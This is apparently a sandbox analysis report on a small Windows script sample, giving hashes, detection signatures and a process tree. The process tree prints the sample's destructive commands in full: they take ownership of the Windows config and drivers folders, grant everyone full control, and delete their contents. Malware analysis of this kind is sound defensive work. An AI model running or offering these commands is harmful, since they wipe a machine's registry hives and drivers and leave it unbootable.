Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 21:37
Static task
static1
Behavioral task
behavioral1
Sample
target.wsf
Resource
win7-20240704-en
General
-
Target
target.wsf
-
Size
2KB
-
MD5
6425a144c5de5bc3bcd5865809150a0d
-
SHA1
257d00e71e71832c90fc494b5121df3a8149560d
-
SHA256
7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
-
SHA512
95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2564 takeown.exe 2608 takeown.exe 1804 icacls.exe 2744 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 2564 takeown.exe 2608 takeown.exe 1804 icacls.exe 2744 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2564 takeown.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2512 wrote to memory of 2264 2512 cmd.exe WScript.exe PID 2512 wrote to memory of 2264 2512 cmd.exe WScript.exe PID 2512 wrote to memory of 2264 2512 cmd.exe WScript.exe PID 2264 wrote to memory of 2796 2264 WScript.exe cmd.exe PID 2264 wrote to memory of 2796 2264 WScript.exe cmd.exe PID 2264 wrote to memory of 2796 2264 WScript.exe cmd.exe PID 2264 wrote to memory of 2844 2264 WScript.exe cmd.exe PID 2264 wrote to memory of 2844 2264 WScript.exe cmd.exe PID 2264 wrote to memory of 2844 2264 WScript.exe cmd.exe PID 2844 wrote to memory of 2564 2844 cmd.exe takeown.exe PID 2844 wrote to memory of 2564 2844 cmd.exe takeown.exe PID 2844 wrote to memory of 2564 2844 cmd.exe takeown.exe PID 2796 wrote to memory of 2608 2796 cmd.exe takeown.exe PID 2796 wrote to memory of 2608 2796 cmd.exe takeown.exe PID 2796 wrote to memory of 2608 2796 cmd.exe takeown.exe PID 2796 wrote to memory of 2744 2796 cmd.exe icacls.exe PID 2796 wrote to memory of 2744 2796 cmd.exe icacls.exe PID 2796 wrote to memory of 2744 2796 cmd.exe icacls.exe PID 2844 wrote to memory of 1804 2844 cmd.exe icacls.exe PID 2844 wrote to memory of 1804 2844 cmd.exe icacls.exe PID 2844 wrote to memory of 1804 2844 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2608
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1804
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56425a144c5de5bc3bcd5865809150a0d
SHA1257d00e71e71832c90fc494b5121df3a8149560d
SHA2567c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA51295dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34
-
Filesize
78B
MD5ece02545122cc48c9d8afaf3f94dd04f
SHA18e07b6da685faad07f8413230a95ce0ae8987e0d
SHA2565098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5